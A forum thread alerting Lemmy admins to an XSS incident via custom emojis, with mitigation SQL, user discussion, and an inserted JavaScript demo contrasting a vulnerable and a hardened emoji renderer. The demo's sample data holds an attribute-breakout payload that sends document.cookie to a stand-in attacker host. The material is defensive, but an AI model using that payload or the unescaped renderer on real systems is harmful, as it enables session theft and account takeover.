wakest ⁂

ATTENTION LEMMY ADMINS: XSS VULNERABILITY NEEDS PATCHING

Details:
lemmy.world/post/1293336

Lemmy.world was hacked and most Lemmy servers are still vulnerable to the exploit:
lemmy.world/post/1290412

[posted also to @fediverse]

lemmy.world: Recap of the Lemmy XSS incident & steps for mitigation - LemmyWorld

This post is intended as a central place that admins can reference regarding the XSS incident from this morning.

### What happened?

A couple of the bigger Lemmy instances had several user accounts compromised through stolen authentication cookies. Some of these cookies belonged to admins; these admin cookies were used to deface instances. Only users that opened pages with malicious content during the incident were vulnerable. The malicious content was possible due to a bug with rendering custom emojis. Stolen cookies gave attackers access to all private messages and e-mail addresses of affected users.

### Am I vulnerable?

If your instance has ANY custom emojis, you are vulnerable. Note that it appears only local custom emojis are affected, so federated content with custom emojis from other instances should be safe.

### I had custom emojis on my instance, what should I do?

This should be enough to mitigate now:

1. Remove custom emoji

```sql
-- keyword rows reference custom_emoji, so delete them first
DELETE FROM custom_emoji_keyword;
DELETE FROM custom_emoji;
```

2. Rotate your JWT secret (invalidates all current login sessions)

```sql
-- back up your secret first, just in case
SELECT * FROM secret;
-- generate a new secret
UPDATE secret SET jwt_secret = gen_random_uuid();
```

3. Restart Lemmy server

If you need help with any of this, you can reach out to me on Matrix (@sunaurus:matrix.org) or on Discord (@sunaurus)

### Legal

If your instance was affected, you may have some legal obligations. Please check this comment for more info: https://lemmy.world/comment/1064402

##### More context:

https://github.com/LemmyNet/lemmy-ui/issues/1895
https://github.com/LemmyNet/lemmy-ui/pull/1897
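The bug class the recap describes (a custom-emoji renderer that lets stored content reach the page as markup, so that anyone viewing the post runs the attacker's script and leaks their session cookie), as an added illustration that is not lemmy-ui's code: a shortcode expander that drops a stored field straight into an HTML attribute, beside a hardened version that escapes attribute values and only emits http(s) image URLs. The data model (`image_url`, `alt_text`), the `:name:` shortcode syntax, the emoji table and the cookie-exfiltrating payload are all constructed for this demo; which emoji field was actually injectable in lemmy-ui is in the linked issue and is not reproduced here.

```javascript
// Illustrative custom-emoji renderer, vulnerable vs hardened. Constructed demo,
// not lemmy-ui's code. Assumed data model: an emoji table keyed by shortcode
// with image_url and alt_text fields, where alt_text is attacker-influenced.

// Constructed sample emoji table. The "pwn" entry carries a payload that closes
// the alt attribute and adds an event handler that ships document.cookie off-site.
const EMOJIS = {
  lemmy: {
    image_url: "https://example.invalid/emoji/lemmy.png",
    alt_text: "lemmy logo",
  },
  pwn: {
    image_url: "https://example.invalid/emoji/pwn.png",
    alt_text: "x\" onerror=\"fetch('https://attacker.invalid/?c='+document.cookie)",
  },
};

// Shortcodes look like :name: in a post body.
const SHORTCODE = /:([a-z0-9_]+):/g;

// Vulnerable: stored fields are interpolated into tag markup unescaped.
function renderEmojiVulnerable(text, emojis = EMOJIS) {
  return text.replace(SHORTCODE, (match, name) => {
    const e = emojis[name];
    if (!e) return match;
    return `<img class="emoji" src="${e.image_url}" alt="${e.alt_text}" title="${e.alt_text}">`;
  });
}

// Escape a value for use inside a double-quoted HTML attribute (also safe as text).
function escapeAttr(s) {
  return String(s)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// Accept only absolute http(s) image URLs; anything else is dropped.
function safeImageUrl(url) {
  try {
    const u = new URL(url);
    return u.protocol === "https:" || u.protocol === "http:" ? u.href : null;
  } catch {
    return null;
  }
}

// Hardened: every stored value is escaped before it touches markup and the
// image URL is validated. The surrounding post text is assumed to have been
// escaped already by the markdown renderer; this only expands shortcodes.
function renderEmojiHardened(text, emojis = EMOJIS) {
  return text.replace(SHORTCODE, (match, name) => {
    const e = emojis[name];
    if (!e) return match;
    const src = safeImageUrl(e.image_url);
    if (!src) return match; // leave the shortcode as plain text
    const alt = escapeAttr(e.alt_text);
    return `<img class="emoji" src="${escapeAttr(src)}" alt="${alt}" title="${alt}">`;
  });
}

// Crude check used by the demo: does the markup contain an on* event-handler
// attribute, i.e. did a stored value break out of its attribute?
function containsEventHandler(html) {
  return /\son[a-z]+\s*=\s*"/i.test(html);
}

// Constructed post body exercising a benign, a malicious and an unknown shortcode.
const SAMPLE_POST = "Hello :lemmy:, look at :pwn: and :nope:";

console.log("vulnerable:", renderEmojiVulnerable(SAMPLE_POST));
console.log("hardened:  ", renderEmojiHardened(SAMPLE_POST));
```

Whether a session cookie is readable from `document.cookie` at all depends on its HttpOnly flag; the recap does not say how Lemmy set it, so the payload here assumes a readable cookie. The recap's mitigation attacks both ends: deleting the emojis removes the injection point, and rotating the secret invalidates whatever was already stolen.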

This would be more relevant in !lemmy@lemmy.ml, although there’s already a post about it there.

@mondoman712 lemmy is part of the fediverse so it is relevant

cross-post it to !lemmy_support@lemmy.ml too.

You do it. It’s your post.

@randoom You do it. It's your desire.

You do it. You should have posted it there.

I wasn’t being disrespectful. And thank you, it’s always fun to argue with a total stranger.

@liaizon is just not a very kind or reasonable person. It’s not you, it’s them.

Should really have “If you added custom emojis” somewhere ;)

@cwagner oh no, some admin who didn't add custom emojos might get alerted that there is a bad bug and not have anything to do!

Sorry for suggesting how your post can become more informative, I’ll make sure to avoid doing such things in the future.

OP was unnecessarily rude to you. I’m waiting for my mod ban for calling them out. This place can’t be that different than reddit.

It is generally a good practice to be specific when describing vulnerabilities. Further, people tend to just read headlines and we know this. You don’t need to be a snarky jerk when someone points that out. Heaven forbid people learn something, sheesh.

@MaybeItWorks I responded snarkily and I agree that isn't helpful either. It was the third reply I had gotten criticizing this post, which set me off a bit. Maybe the people responding were just trying to be helpful, but so was I, so I guess we all need to take a look at our own response mechanisms.

Waiting on patches to propagate to the container registries.

Yeah, thank you! Only had to sacrifice our custom emojis for now :)

@liaizon @fediverse I only joined a few days ago. I suppose this means I have to alter my password?

The attack shouldn’t have exposed passwords or hashes, only the JWT cookie. The secret on the server has been changed so all old cookies should no longer work.

There is a very small possibility that your email address may have been able to be seen if they logged in as you, but they were looking for admin accounts.

Does anyone know what maintainers should do to patch the vulnerability?

Been patched already in the 0.18.2 release candidates.